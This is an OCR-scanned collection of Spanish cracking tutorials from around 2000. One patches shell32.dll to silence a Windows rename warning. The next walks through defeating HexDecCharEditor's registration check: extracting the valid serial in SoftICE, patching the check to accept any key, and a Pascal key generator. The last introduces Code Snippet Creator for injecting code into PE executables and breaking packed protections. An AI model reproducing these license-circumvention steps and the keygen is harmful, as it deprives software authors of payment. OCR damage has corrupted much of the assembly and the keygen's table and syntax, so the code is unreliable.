tricción, a veces el propósito es perfeccionar una herramienta existente. 


Una cosa que debéis aprender a hacer es pensar como un hacker. No os debéis preguntar a 
vosotros mismos si sois capaces de hacer una cosa o no, sino cómo hacerla. 


2 Contactos 


Si deseaseis contactar conmigo, mandadme un e-mail a xerxesGaltern.org. Podéis conseguir mi 
llave pública PGP en http://altern.org/xerxes que es la URL de mi modesto sitio web. Ya que soy 
francés, podéis escribirme en francés o inglés. Usad el lenguaje que prefiráis. También podéis 
contactar conmigo a través del tablón de mensajes de +Fravia. 


Por favor, evitad e-mails inútiles, esto es, ¡preguntad sólo cuestiones inteligentes!. Por otra 
parte, serán bienvenidas críticas y sugerencias, también correcciones. 


No uso nunca ICQ ni IRC, así que si conocéis alguien que dice ser ArthaXerXés, usando ese 
medio, es mentira. 


3 Algunas palabras sobre lo que vamos a emprender 


En este ensayo, voy a demostraros que no hay límite de lo que el Arte puede llegar a hacer. 
Vamos a modificar el mismísimo Windows a fin de cambiar su conducta para cumplir nuestras 
necesidades. 


¿Habéis notado que Windows pide una confirmación cada vez que cambiáis la extensión de un 
archivo?. Cread un archivo .txt y renombradlo a un archivo .exe. Windows os dirá que esta 
operación puede causar problemas. ¿No pensáis que este mensaje es muy molesto (y muy 
estúpido) ?. 


Os voy a enseñar cómo quitarlo. 


4 Los requisitos 


Daré por hecho que habéis leído mi ensayo previo, si no lo hicisteis, realmente os animo a ha- 
cerlo. 


5 Software usado 


Necesitaréis un debugger y un editor hexadecimal. El debugger que recomiendo es Softice 
(http://www.compuware.com), y el editor hexadecimal que recomiendo es WinHex (http://www. 
winhex.com). 


6 Quitando el Messagebox 


6.1  Colocando el breakpoint 


Esta vez, la ventana que aparece no es una caja de diálogo sino una caja de mensaje. Una 
caja de mensaje es una versión “ligera” de una caja de diálogo, proporciona una presentación 
mínima para que no tengáis que crear una caja de diálogo para temas simples como confirma- 
ciones, información, etc. 


El breakpoint que debéis colocar es MessageBoxA, porque es el nombre de la API que crea la 
caja de mensaje. 


Cread un archivo de texto y cambiad la extensión txt a exe. Volved a la llamada como expliqué 
en mi último tutorial (presionad F11) y apareceréis aquí: 


71d04c17 test edi, edi 

71d04c19 jz short loc_7FD04C4A 
71d04c1b mov eax, [ebp+arg_10] 
Tfd04c1e or eax, 10000h 
71d04c23 push eax 

71d04c24 push esi 

71d04c25 push edi 

71d04c26 push [epb+arg_4] 
71d04c29 call DS : MessageBoxA 
71d04c2f push edi ; <-- aquí 
71d04c30 mov esi, eax 

71d04c32 call DS : LocalFree 
71d04c38 loc_7FD04C38 
71d04c39 mov eax, esi 

71d04c3a pop edi 

71d04c3b pop esi 

71d04c3c leave 

71d04c3d retn 


nota importante: El código y las direcciones pueden ser diferentes en vuestro sistema, pero 
deberían ser similares. Para el resto del ensayo tened esto en cuenta y usad vuestros valores, 
no los míos (a menos que sean iguales, por supuesto). 


Si presionáis Sí, eax es igual a 6, si presionáis No es igual a 7. Esto es todo lo que necesita- 
mos saber, ahora podemos parchear el sistema. 


6.2  Parcheando ventanas 


Lo que nos molesta es la caja de mensaje, no la comprobación que se hace, ¿no?. Quitar la 
comprobación puede ser peligroso ya que puede interferir con otros componentes del sistema 
operativo. Cuando hackeamos un OS, no deberíais meteros demasiado dentro de su corazón 
(a menos que realmente sepáis lo que estáis haciendo). 


Mi solución aquí es saltar sobre la llamada a la caja de mensaje y poner 6 en eax, como si pre- 
sionamos Sí. Es un hack muy simple. 


Hagamos un intento. Escribid abajo los bytes presentes en la dirección 7fd04c1b y ensamblad 
este código (a 7fd04c1b): 


mov eax, 6 


jmp 7fd04c2f 


Es importante que la función LocalFree sea ejecutada porque liberará la memoria localizada en 
la cadena desplegada por la caja de mensaje. Si no la ejecutáis añadirá una pérdida de memo- 
ria a la colección de pérdidas de memoria de Windows. 


6.3  Testeando y parcheando la DLL 


Ahora desactivad todos vuestros breakpoints (bd *) e intentad cambiar la extensión de un archi- 
vo. Deberíais notar que ahora ninguna caja de mensaje se despliega en absoluto. Si lo hace, 
habéis ensamblado ciertamente el código en una dirección errónea. 


Ahora tenemos que hacer el parcheado de la DLL correspondiente (la cual es shell32.dll de 
acuerdo con Softlce) ya que cuando reiniciéis vuestra computadora la caja de mensaje no 
vuelve. 

Haced una copia de seguridad del archivo original a algo como shell32.bak y copiad shell32.dll 
a un directorio temporal. Buscad los bytes que escribisteis abajo (para mí esto sería 8b 45 18 
0d) y poned los bytes correspondientes al código que ensamblamos (en mi caso los bytes nue- 
vos son: b8 06 00 00 00 eb 0d). 


Ya que no podéis reemplazar la dll mientras Windows se esté ejecutando, salid a DOS y reem- 
plazad el archivo original con el hackeado. Reiniciad... 


... debería trabajar bien ahora, Windows no os acosará nunca más. :-) 


7 El final de este (muy) corto ensayo 


Espero que disfrutaseis este ensayo; hacedme saber si algo es poco claro o si mi hackeo cau- 
sa problemas (realmente no sé si trabaja bajo Windows NT). 


Hecho con LATEX2e un Lunes 6 de Marzo del 2000. Versión 1.0 


Como obtener un número de serie para el HexDecCharEditor v1.02 
Como parchearlo para que acepte cualquier número. 
Como hacer un KeyGenerator 


By Black Fenix 
HexDecChar Editor es un editor hexadecimal y decimal que ocupa relativamente poco y su uso es bastante sencillo. Por lo que si te gusta, recuerda compraló :) . 


Bienvenido a mi segundo tutorial sobre cracking, en esta entrega vamos a usar tres metodos diferentes para crackear el programa es cuestión: 


El primero y más sencillo se trata de conseguir un numero válido para el nombre que introduzcamos a partir del trazado del programa, sin modificación ninguna de este. 
El segundo metodo mas complicado se trata de hacer que el programa acepte cualquier número de serie que le introduzcamos modificando para ello el ejecutable (recuerda esto está prohibido). 
El tercero y más complicado se trata crear nuestro propio programa que genere numeros de serie válidospara el nombre que le introduzcamos (esto es lo que hacen los verdaderos crackers). 


a 
Msorice para Windows 
A 


¡e W32Dasm 
7] 
A Turbo Pascal (Para el Key Generator) 


Nota: Puedes encontrar algunas de estas tools en http://www. astalavista.box.sk/, el HexDecCharEditor lo puedes descargar de http://www.beyersdorf. com/ 


> 
A Ejecutamos el HexDecCharEditor y nos aparece un ventana (NAG) en la que nos avisa de que esta versión es de evaluación de 30 días. Vemos que hay un botón que pone Enter Key, hacemos click en el y nos aparece 
un cuadro de dialogo donde podemos introducir nuestro nombre y el numero de registro. Escribimos nuestro nombre ej: Black Fenix, y la llave pej: 12345. Pulsamos Ok y que tenemos, Un cuadro de dialogo que entre otras 
cosas dice: 


"Sorry, but the name an the key you entered cannot be accepted together." 


Bueno ya tenemos algo por donde empezar, le decimos que vale y salimos del programa. 


- 
Ml vamos a buscar las posibles referencias a esta cadena dentro del EXE por lo que desensamblamos el EXE con el W32Dasm. Pulsamos en el botón StrnRef y buscamos la cadena en la lista que nos aparece, cuando la 
encontremos (esta por abajo) hacemos doble click sobre esta y el W32Dasm nos llevará al primer sitio donde hay una posible referencia a esta cadena (aunque hagamos más veces doble click no nos moveremos del sitio 
ya que no hay más referencias a esta cadena).Ahora podemos ver el código que es algo como esto: 


* Referenced by a (U)nconditional or 
(C)onditional jump at address: |:0043589C 


:004358AA B8D05B4300 mov eax,00435BDO 
:004358AF E8SBC9DFFFF call 0042F670 
Bueno, tiene toda la pinta de ser lo que buscamos ya que debajo hay una llamada que posiblemente será la que muestre el cuadro de dialogo con la cadena "Sorry.... ". Ya que estamos aquí podemos ver en la linea superior 


que hay un salto que hace referencia a la dirección 4358AA podemos ver donde esta en la linea donde dice "Referenced by ..."al final muestra una sola dirección que es la 43589C, esta dirección está un poco más arriba por 
lo que nos moveremos hacia arriba hasta en contrar dicha posición, veremos algo así: 


:0043588E EB24 ¡mp 4358b4 
* Referenced by a (U)nconditional or 
(C)onditional jump at address: |:0043585C 


:00435890 ES9F23FDFF call 00407C34 
:00435895 83BBD80100007 cmp dword ptr [ebx+000001D8],00000007 
:0043589C 750€ ¡ne 004358AA 


Hmmm, una comparación y un salto despues de una llamada a una función, parece sospechoso ya que este salto nos envia al cuadro de dialogo directamente, pero también podemos ver que aquí solo se puede entrar 
desde un salto que se hace en43585C ya que por encima de la llamada hay un jmp (salto incondicional) por lo que es lógico suponer que esta comparación no es exactamente la que buscamos aun que si que tenga algo 
que ver. Nos vamos a la linea donde se hace el salto (43585C) y contemplamos lo siguiente. 


:00435855 ESEEC2FFFF call 00431B48 
:0043585A 84CO0 test al, al 
:0043585C 7432 je 00435890 


200435858 ........... mov byte ptr [00456520], 1 

1004359865 ........... mov dword ptr [ebx+128], 1 
:0043586F ........... cmp dword ptr [ebx+1D8],7 
1004359876 ........... j¡ne 00435884 


Bueno, esta si que tiene toda la pinta ya que la llamada y la comprobacion deALson mucho más sospechosas que la anterior, ademas si nos fijamos en el resto del código podremos ver que hay cadenas escritas en alemán 
ya que este programa permite seleccionar el idioma inglés o el alemán. Por lo que es posible que utilice una variable global para indicarlo y asi saber si debe mostrar los mensajes en uno u otro idioma, Examinando los 
saltos que hay por esta zona vemos que hay una comparación bastante usada y es: cmp dword ptr [ebx+000001D8],00000007, si nos fijamos los saltos que vienen después de esta comparación nos envian a partes de 
código que hacen referencia a cadenas escritas en alemán, por lo que ya sabemos que estos saltos los podemos descartar (por eso el primer salto lo he descartado). Bueno ahora ya sabemos casi con toda seguridad 
donde se realiza la comprobación del número de registro, por lo que apuntaremos la dirección que está al lado del call 00431B48en este caso es 435855. 


La primera aproximación... | 


5 
y Cerramos el W32Dasm y nos vamos al Sl, antes ejecutaremos el HexDecCharEditor y iremos hasta el cuadro de dialogo de registro, introduciremos un nombre y una clave ej: 


Name : Black Fenix 
Key : 12345 


Antes de pulsar en Ok activamos el Sl (Ctrl+D). De lo que se trata ahora es interrumpir la ejecución del programa en la dirección 435855, si intentamos establecer un BPX con bpx 435855 sin haber entrado con el SI en la 
zona de memoria donde está situado el programa, el Sl nos dirá "invalid address" por lo que debemos interrumpir el programa de alguna otra manera para poder entrar en su zona de memoria. 

Esto es fácil ya quepodemos poner un BPX en HMEMCPY (usada por Windows para copiar cadenas ) y despues ir trazando con F12 hasta llegar a la zona donde esta nuestro programa. Pues venga un bpx en hmemcpy 
salimos del Sl (Ctrl+D) y pulsamos en OK. 


Boom!, de nuevo en el Sl y antes de que aparezca ningun cuadro de dialogo. Ahora estamos en KERNEL32.DLL vamos a salir de aquí pulsando F12 hasta que podamos ver que nos encontramos en el código fuente de 
nuestro programa (debera poner HEXDECCHAREDITOR!CODE+XXXXXXXX). Ok estamos en la zona que buscamos ahora podemos borrar el BPX al HMEMCPY y establecer uno nuevo en la dirección 435855 con BPX 
435855. Pulsamos g+Enter para seguir con la ejecución normal del programa y Boom! ya estamos donde queriamos, ahora vamos a examinar la llamada. Pulsamos F8 y estaremos dentro, a primera vista parece una rutina 
bastante compleja ya que podemos ver un gran numero de llamadas a otras partes del programa pero vamos a pensar a lo facil y buscaremos (para navegar por la ventana de codigo usaremos el mouse o Ctrl+Cursor 
adecuado) la primera comparación que encontremos después de una llamada. vamos trazando con F10 poco a poco hasta encontrar: 


CALL 00405AC8 
CMP ESI,EAX 
JNZ 0431D17 


Hmmm, podria ser esta?, comprobemos los valores de ESI y EAX tecleando: 


? esi Enter 
? eax Enter 


ESI= 6345Fh -> 406623 -> Adininas ? 
EAX= 3039h -> 12345 -> Vaya es IGUAL que nuestro numero de registro :) 


Bueno creo que lo hemos encontrado, esta comparando nuestro numero de registro (en mi caso 12345) con otro numero (posiblemente el bueno). Comprobemoslo, salimos del Sl, y el programa nos dara el mensaje de que 
no sirve nuestro numero , ahora ponemos el numero con el cual era comparado el nuestro y !!|SORPRESA!!El programa está registrado. 


La segunda aproximación... | 


Si lo que quieres es que el programa acepte cualquier numero habra que eliminar la llamada previa al CMP ESI,EAX y hacer un XOR de EAX y otro de ESI para ponerlos a O antes de la comparación más un NOP para que 
quede todo correcto (el call ocupa 5 bytes los XOR cada uno 2 bytes y el NOP 1 byte sumando un total de 5). Posteriormente deberas hacer los cambios en el ejecutable con un editor Hexadecimal que puede ser el mismo 


La tercera aproximación, lo que un verdadero cracker debe saber hacer ... 


Para los más avanzados que quieran hacer un generador de numeros pueden encontrar como lo hace el programa a partir de la dirección 431AC4 en adelante. 
Aquí podeis ver un volcado de la rutina que se encarga de esto: 
El estado de los registros utilizados al llegar a este punto es el siguiente: 


eax,esi = Longitud del nombre introducido en caracteres 

edx = Puntero al nombre introducido 

edi = 1 

ebp-4 = Puntero al nombre introducido 

ebp-8 = Puntero a un dword que será donde se almacene el numero de serie válido. 


:00431AC4 mov ebx, 00000001 -> carga contador principal de caracteres 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00431B01(C) 


:00431AC9 mov ecx, ebx -> copia contador principal al secundario 

:00431ACB dec ecx -> decrementa en 1 contador secundario 

:00431ACC and ecx, 8000000F -> comprueba si el numero es negativo 

:00431AD2 ¡ns 00431AD9 -> salta si no lo es a 431AD9 

:00431AD4 dec ecx -> creo que esto no llega a ejecutarse 

:00431AD5 or ecx, FFFFFFFO -> nunca 

:00431AD8 inc ecx -> si la longitud de la cadena es -> mayor que 1 (siempre hay caracteres ) -> por lo que no puede ser negativo. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|1:00431AD2(C) 


:00431AD9 lea eax, dword ptr [ebx+edi] -> suma al contador de caracteres principal 1 y -> pone el resultado en eax 

:00431ADC push ecx -> guarda contador secundario 

:00431ADD mov ecx, 00000112 -> prepara ecx con 112h=274 para multiplicar 

:00431AE2 cdq -> extiende el signo de eax a eax:edx -> para multiplicar con signo 

:00431AE3 idiv ecx -> multiplica (contador de caracteres+1)*112h 

:00431AE5 pop ecx -> restaura contador secundario de caracteres 

:00431AE6 mov al, byte ptr [edx+0045480C] -> usa la parte alta como indice a una tabla -> de valores preconstruida-> y guarda este valor en AL 
:00431AEC mov edx, dword ptr [ebp-04] -> Carga puntero al nombre introducido 

:00431AEF mov dl, byte ptr [edx+ebx-01] -> lee siguiente caracter de la cadena -> recordar que EBX es el contador principal -> de caracteres 
:00431AF3 xor al, dl -> Hace un XOR sobre el valor de la tabla pre-> construida con el valor del caracter -> de la cadena 

:00431AF5 and eax, 000000FF -> realiza un AND sobre EAX para que este -> quede sólo con el valor de AL 

:00431AFA shl eax, cl -> por último desplaza a la izquierda -> en un numero igual al contador -> secundario de caracteres 

:00431AFC add dword ptr [ebp-08], eax -> suma el resultado al codigo final -> que está en ebp-8. Nota: en el primer -> paso ebp-8 valdrá O ya que es inicializado -> por el programa antes de llamar -> a la 
rutina que cálcula el número 

:00431AFF inc ebx -> incrementa contador principal de caracteres 

:00431B00 dec esi -> decrementa el numero de caractereas procesados 

:00431B01 ¡ne 00431AC9 -> salta , si hay más ( esi <> 0) 


Basicamente la rutina es bastante sencilla, utiliza un contador de caracteres con el cual realiza un calculo usando un valor constante (112h) y usa una parte del resultado como indice a una tabla de caracteres 
precalculadosde la cual obtiene un valor, este valor lo hace servir para realizar otra serie de calculos con el valor ASCII del caracter que se esta procesando y así obtener un resultado que suma al codigo definitivo. 

El problema reside en la tabla de numeros precalculada que esta almacenada a partir de la dirección 45480C. Yo me pregunto si tiene algun limite en la longitud del nombre que se le puede introducir ya que de este 
depende el índice con el que se accede a la tabla, pero por las pruebas que he hecho parece una tabla muy grande por lo menos de 1024 valores, En principio creo que el programa no hace ningún calculo sobre la longitud 
máxima del nombre. 

En que nos afecta esto a nosotros ? Pues bien, debemos copiar dicha tablapara poder crear el programa que genere numeros válidos, pero, ¿Como sabemos cuantos valores copiar? Este es el problema, no vamos a 
matarnos en copiar todos los valores, además no sabemos que longitud puede tener esta tabla , pero parece muy larga, por lo que yo he optado por copiar una cantidad suficiente de esta (unos 90 valores). 


¡meros ( Key Generator ) 


Aquí teneis el programilla final en Pascal con un poquitin de assembler. Podeis encontrar el ejecutable compilado junto con este documento se llama HexDeck.exe 

Program HexDecChar_KeyGenerator; 

Uses Crt; 

Const Table:array [0..92] of byte= ($34,$a0,$d5,0,$f7,$524,$5d,$5c,$0a,$8c,$10,$d6,59e,$b5,$9c,$66,0 
,524,$6f,520,544,$4d,5a2,$f0,510,527,555,520,5E7,$5F7,$E8,5$A3,$47, 
$F9,514,$AC,$E8,$44,$98,$2C0,553,$58, $EB,$FE,$25,5B0,$FC,$4E,$77, 
$CC,$66,$49,$DA,$7C,$C6,$8E,$D1,$5C,522,$D9,$C5,$C8,$90,$5E4,$BF, 


$B4,$79,$87,$7E,$3E,$3D,$76,5$A3,$D6,$08,$43,51A,$52,520,56B,$EC, 


S5E,$FE,$A9,$23,$05,$F5,$C8,577,554,$3F,$AC,$DB); 


Var 
Count2,Tablndex:integer; 
i:word; 
CharTab,CharName:byte; 
Codigo,ResChar:Longint; 
Name: string[90]; 

Begin 


Writeln; 

textcolor(7); 

Writeln(HexDecChar Editor v1.02 Key Generator by Black Fenix.”); 
Writeln (-——————— »; 

Write('Enter your name (max 90 chars):"); 

readin(Name); 

Codigo:=0; 


For ¡i:=1 to length(Name) do 
Begin 


Count2:=i; 
Dec(Count2); 
Count2:=Count2 and $8000000F; 


if Count2<0 then 


Begin 
dec(Count2); 
Count2:=Count2 or -10; 
inc(Count2); 

End; 


[ Nota: los codigos de operación de 386 no estan permitidos en el Turbo Pascal 7.0 por lo que debemos usar la directiva db para introducir el código de operación de ] 
f la instrucción deseada, ¿ Si no sabes algo de assembler que coño haces leyendo esto ?) 


asm 


db $66 / esto expande la instrucción siguiente a xor eax,eax ) 
xor ax,ax 

mov ax, i 

db $66 / esto expande la instrucción siguiente a inc eax ] 

inc ax 

db $66 / esto expande la instrucción siguiente a xor ecx,ecx ] 
XOr CX,CX 

mov cx,$112 

db $66,$99 / esto añade la instrucción CDQ ] 

db $66 / esto expande la instrucción siguiente a idiv ecx ] 

idiv cx 

mov Tablndex,dx f coge el resultado para usarlo como indice ] 


end; 


CharTab:=Table[Tablndex]; 
CharName:=ord(Nameli]); 
ResChar:=(CharTab XOR CharName) and $ff; 
ResChar:=ResChar shl Count2; 
Codigo:=Codigo+ResChar; 


End; 


Write('Your registration number is:”); 
textcolor(15); 

Write(codigo); 

textcolor(7); 


End. 


You are inside Reversed Minds pages. 


por Black Fenix. 
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Snippet Creator: TUTORIAL 


Romper protecciones de empaquetados 


AUTOR: nuMIT_or 


HERRAMIENTAS: Code SnippetCreator 
HexWorkShop v2.5 
SICE 3.XX o superior (¿qué haríamos sin él?) 
MASM 6.X o TASM 5.0 
SNIP.ZIP 


NOTA: Estas herramientas las puedes hallar en: http://members.xoom.com/crk10/archivos 


TARGET: NOTEPAD.EXE (otra vez). 
AWAVE v4.5. (http: //www.fmjsoft.com) 


CONTENIDO: + INTRO 


. PRESENTACIÓN GENERAL DE Snippet Creator 
* EL PODER: Insertar un objeto nuevo en un archivo PE 

* Tomando el control desde el principio: pasos para insertar el recorte 
* ALGUNOS TIPS 

* Importar una función nueva 

* El recorte es grande y no quiero aumentar el programa 


* Perfeccionando programas : Eliminar una limitación de notepad 


* Observaciones 


* MALDITAS PROTECCIONES: quebrando a AWAVE v4.5 
* Parchando archivos empaquetados con SnippetCreator 
* Todo el poder: intercepción de llamadas a APIs 


* El verdadero crack 
* ALGUNAS PREGUNTAS - ALGUNAS RESPUESTAS 
* ¿Existen otros programas, además de Snippet Creator? 


* ¿Por qué mantener el tamaño del archivo parchado es importante? 
* ¿Las jmp de las apis estan siempre en secciones .text? 
* ¿Qué significan las caracteristicas de las secciones de un PE? 


* ¿Qués es una DLL y para qué sirve? ¿cómo se crea? 


Particularmente veo el mayor potencial de conocer los encabezados del PE en la personalización de 
programas. Sin un editor de recursos se puede cambiar el comportamiento de los menúes, de los diálogos 
y mucho más. También podríamos ampliar la funcionalidad de las aplicaciones y mejorarlas. Es un 
trabajo que podemos hacer "manualmente". Pero antes de hacerlo, creo conveniente aprovechar la 
oportunidad que nos brinda una herramienta como Snippet Creator de Iczelion. 


Es una herramienta que requiere cierto conocimiento de programación y, especialmente, conocer sobre 
los encabezados PE. Ahora que sabemos algo de esto último podemos emplearla. De hecho, el uso de esta 
herramienta nos permitirá aprender más sobre la estructura y funcionamiento 

de los archivos con formato PE. Si no tienes conocimientos de programación para W32 en lenguaje 
ensamblador, este es el momento de empezar: hay un buen tutor en español de MrCrimson: 


http://members.xoom.com/crk10/archivos/MrCrimson.zip. 


Sólo algunas indicaciones preliminares. Para facilitar la creación de programas es recomendable que 
configures correctamente el entorno de tu sistema. Para esto, si haz instalado en tu disco duro el MASM 
distribuido por Hutch (lo puedes bajar de http://members.xoom.com/crk10/archivos), debes agregar las 


siguientes en tu archivo autoexec.bat: 


SET BIN = CAMASM321BIN 
SET INCLUDE = CAMASM32UNCLUDE 
SET LIB = CAMASM321LIB 


SET PATH = %BIN%;%INCLUDE%;%LIB%;%PATH% 


En el directorio CAMASM32WBIN estarán los BINarios ejecutables del programa; en 
CAMASMB2AUNCLUDE, los archivos .INC; y en el directorio CAMASMBALIB las LIBrerías. 
Colocando estas líneas en autoexec.bat, puedes llamar a cualquier archivo en uno de estos directorios 
desde cualquier directorio del sistema. 


PRESENTACIÓN GENERAL DE Snippet Creator 


Snippet Creator permite insertar código nuevo en archivos con formato PE y, por lo tanto, es una 
herramienta útil para personalizar la conducta de las aplicaciones. Funciona como una especie de IDE 
(Integrated Development Environment: Ambiente de Desarrollo Integrado), brindándonos un entorno 
propicio para el desarrollo de snippets (recortes) para injertar a nuestro gusto en archivos con formato PE: 


A Code Snippet Creator version 1.05 by lezelion¿PC 
File Edit PE Info Action Help 


— NEWPAD - 
| 


ca | 


IMAGEN 1 


Primero tenemos que crear un proyecto con el comando "FilelNew Proyect". En la ventana "New Project 
Options" colocamos un nombre en el campo Project. NEWPAD, por ejemplo. Hacemos una copia de 
notepad.exe y la renombramos como NEWPAD.EXE (yo he empleado la versión antigua de Win 953 en el 
archivo SNIP.ZIP). Pulsamos BROWSE buscamos NEWPAD.EXE. Pulsamos Create. 


New Project Options El 


Project: [NEWPAD Cancel 
Program: [C-0wWINDOwSATEMPANEWPAD.EXE Browse. 


IMAGEN 2 


Ahora Snippet Creator ha creado una carpeta en su directorio con el nombre NEWPAD. En ella se 


crearán: 


- Un archivo .INI que gurada la información y configuración del proyecto 
- El archivo fuente .ASM del recorte que escribamos. 
- Los archivos .OBJ, .EXE y .BIN que se compilarán. 


Una vez creado el proyecto, puede ser cerrado y abierto de nuevo: ir a File/Open Project. Esto te 
permitirá abrir un archivo .INF que gurada la información que hemos salvado sobre el proyecto 
previamente creado. En nuestro caso abre el directorio NEWPAD y abre el archivo NEWPAD.INF. 


Ahora vayamos a PE InfoWView PE header. Se desplegará la caja de diálogo "PE Header Information" 
correspondiente a NEWPAD.EXE. 


PE Header Information [ Newpad.exe ] El 


Major Subsystem ver.: 0004 
File Characteristics: 010€ E Minor Subsystem ver.: 0000 
Subsyster: [windows GUI y] Checksum: | 0000C716 


Machine: 


Image Base Address: — | 00400000 Section Aligament: — [ 00001000 
Size of Image: [ oo00co0o File Alignment: [ 00000200 
Address of Entry Point: 00001000 Size of Uninitialized Data: [ 00000600 
Base of Code: — | 00001000 — Size Ofiritialized Data: | 0000400 

Base of Data: [ 00005000 Size of Code: [ 00003400 

Number Of Sections: [ 00000005 Size Of Headers: [ 00000400 


cos 


IMAGEN 3 


Encontraremos varios campos que ya el uso de PROCDUMP, si lo hemos utilizado, nos ha hecho 
familiares. Esta ventana nos ha de servir para editar algunos valores del encabezado. Si no entiendes ni 
papa, revísate el tutorial Desencabezando Archivos Ejecutables Portables, el primero de esta serie. 


Ahora vayamos a "CView Section Info". Se despliega la caja de diálogo "Section Information". Es 
idéntica a la ventana "Sectons Editor" de PROCDUMP. 


Section |  VSize[| v.Offset[ RawSize| 


00003953 — 00001000 00003400 00000400  E0000020 
00000434 00005000 00000000 00000000  CO000080 
00000212 00006000 00000400  O00O3E00  COD00040 
O0000C34 00007000 OOOODEOO 00004200 40000040 


0003000 00008000 00003000 00005000 40000040 
0000091€ 000068000 00000400 00008000 42000040 


IMAGEN 4 


Esta ventana permite editar de varias maneras las secciones del encabezado. Pulsemos con el botón 
derecho del ratón sobre uno de los nombres y se desplegará el siguiente menú: 


Edit Section 
Save Section 
Kill Section 
Append Section 


Dump DOS Header 
Dump PE Header 
Dump Section Table 
Dump All Headers 


IMAGEN 5 


Creo que los nombres son bastante ilustrativos de lo que se puede hacer aquí. Si escogemos"Edit 
Sections” aparecerá el siguiente diálogo: 


Modify Section Values 


Lex 


franz 


IMAGEN 6 


Es semejante a la ventana "Modify Secton Value" de ProcDump, pero permite elegir características por el 
nombre de constantes. Basta pisar el botoncito "...' del lado derecho a "Chracteristics". 


El comando "PEInfoWView Import Fuctions" despliega una ventana con información sobre los módulos y 
funciones importadas. 


Import Information [ Newpad.exe ] ES 


£ comdlg32. dll 

- GDI32. dll 

- KERNEL32. dll 
- SHELL32. dll 

- USER32 dll 


E 


IMAGEN 7 


El comando "PEInfoWView Data Directories" despliega la siguiente caja de diálogo. 


Data Directories [ Newpad.exe ] 


D0002FB8 


0006000 


IMAGEN 8 


Permite editar los valores del Directorio de datos. 


EL PODER: Insertar un objeto nuevo en un archivo PE 


Este programa realmente hace sentir el poder del conocimiento de la estructura de los archivos PE. 


Insertemos un objeto nuevo en NEWPAD.EXE. Con Snippet Creator podemos colocar el recorte en 
cualquier parte del PE, sea formando una sección nueva o como código nuevo dentro de una sección ya 
existente. Esta última opción, que no requiere la creación de una sección nueva, es la mejor porque no 
incrementa el tamaño del archivo, y es posible siempre y cuando encontremos en alguna de las secciones 
originales espacio para ello. Veremos que casi siempre hay. 


Debemos decidir donde colocar el injerto, pero antes determinar cuándo ha de ejecutarse esta rutina 
nueva. La manera más sencilla es hacer que tome el control al inicio del programa. Si elegimos esta 
opción, tenemos que especificar si la nueva rutina devuelve el control al programa o no. Otra posibilidad 
es colocar el injerto para que se inicie con otro evento o al iniciar alguna rutina específica. 


Veámos estas posibilidades. 


Tomando el control desde el principio: pasos para insertar el recorte 


Como dije, lo más sencillo es hacer que el injerto tome el control al principio y después termine el 
proceso o retorne el control al programa. Siempre lo más sencillo es injertar un mensaje. De hecho, SC 
tiene un tutorial (en inglés) que explica esto. Para los que les cuesta el inglés, resumiré lo que explica Icz: 


1. Debemos primero hacer unos ajustes: vamos a Action/Options. Verás la siguiente ventana: 


General Options EZ 


Default | Cancel | 


Assembler: Jm dc ¿coft ¿Cp 21 
Linker: [LINK ¿FIXED:NO ¿ENTRY:IczelionStart ¿SUBSYSTEM WIND 


Project Directory: [CAMASMITOOLSUCZ 
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No sé si sea necesario explicarlo, pero tienes que: 


1.1. Indicar si usarás MASM o TASM. Son los ensambladores comerciales más 
populares. 


1.2. Para cada uno de ellos, si los tienes, elijes los comandos con sus respectivos 
comutadores. 


1.3. Debes indicar también el directorio donde será creado el proyecto es decir, la rutina 
que injertarás en el PE. 


1.4. OK. 


1.5. Si prefieres y no eres tan quisquilloso, simplemente pulsa DEFAULT y se 
establecerán los valores por defecto. No es una mala opción. 


2. Ahora debes crear un proyecto (File/New Project) u opcionalmente determinar el target (Acton/New 
Target). 


3. Luego viene lo interesante: crear el recorte (snippet). Ahora tienes que escribir el código del recorte 
en la ventana de edición del programa. Los siguientes son más o menos los ejemplos de Icz: 


Para MASM: 


include windows.inc 
include user32.inc 
includelib user32.lib 
jmp init 


Message db "Probando, un, dos, tres. probando",0 


init: invoke MessageBox,NULL,addr Message, NULL,MB_OK 


Para TASM: 


UNICODE=0 
include w32.inc 
jmp ComienzoReal 


Message db "Probando, un, dos, tres. probandot",0 
ComienzoReal: call MessageBox,NULL,offset Message, NULL, MB_OK 


Ahora guarda el código escrito ("File/Save Project"). Snippet Creator creará en la carpeta del proyecto un 
archivo .INF que salvará la información sobre los avances realizados en el proyecto. 


Es necesario observar que el código anotado arriba sólo funciona si, en este caso, MessageBox es una de 
las funciones importadas por el archivo target. Para asegurarse de esto, simplemente vamos a la ventana 
"Import Information" a través de "PEInfoWView Import Fuctions". Hacemos click con el botón derecho 
del ratón sobre USER32.DLL y revisamos. Ya, aparece la función MessageBox. 


Newpad la tiene. No hay problemas. ¿Pero si no la tuviera? Pronto veremos este caso. Por ahora estamos 
tanteando el programilla. 


4. El siguiente paso es ensamblar el recorte: pulsa el botón "Assemble" debajo de la ventana de edición 
o ejecuta el comando "Action/Assemble". Si todo va bien, vamos al siguiente punto. 


5. Exportar el recorte. Al ejecutar el comando "File/Export", se abre la caja de diálogo común "SAVE 
AS". Busca la carpeta del proyecto y salva el archivo .BIN: NEWPAD.BIN, en nuestro caso. Se trata del 
recorte propiamente dicho. Si lo abres con HIEW.EXE (Hacker View) podrás ver un desensamblado de 
lo que escribiste. Esto ya es bastante. Puedes tomar el contenido de este archivo y pegarlo manualmante 
en el sitio indicado del target y ya. Pero SC te puede ahorrar este trabajo. 


6. Ahora el momento crucial: injertar el recorte en el target. Para hacer primero debes ejecutar el 
comando "Acton/Project Options". Esto desplegará la siguiente caja de diálogo: 


Project Options El 


— Snippet Wá, and CPU Model Address to Redirect Control to The Snippet-——= 
Snippet Va: 00406220 C- No Redirection 
Intended CPU: .386 
pS e y GC Redirect Control From Code Section 
ñ Patch Options: 


GC Redirect from call*jmp instruction 
C No Patching 


O Patch as New Section 


(* Patch into Existing Section 


— Retum Control to Program 


Restore Briana Instruction Don't Return Control to Program 


j RESTE YE NMNten INSUUCUON 
| 


(* Return To Program 


Cc | Virtual Address: 401000 
ance | 
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6.1. Debes llenar la caja VA con la dirección virtual donde deseas insertar el recorte 
(snippet). Para esto, hay que encontrar un punto disponible dónde hacerlo. Los sitios 
posibles son: 


a. Al final del archivo, como una nueva sección. Esto incrementa el 
tamaño del archivo. 


b. Entre las tablas de las secciones y la primera sección. También como 
una nueva sección. 


Cc. En algún espacio no utilizado de una sección. Pienso que esta es la 
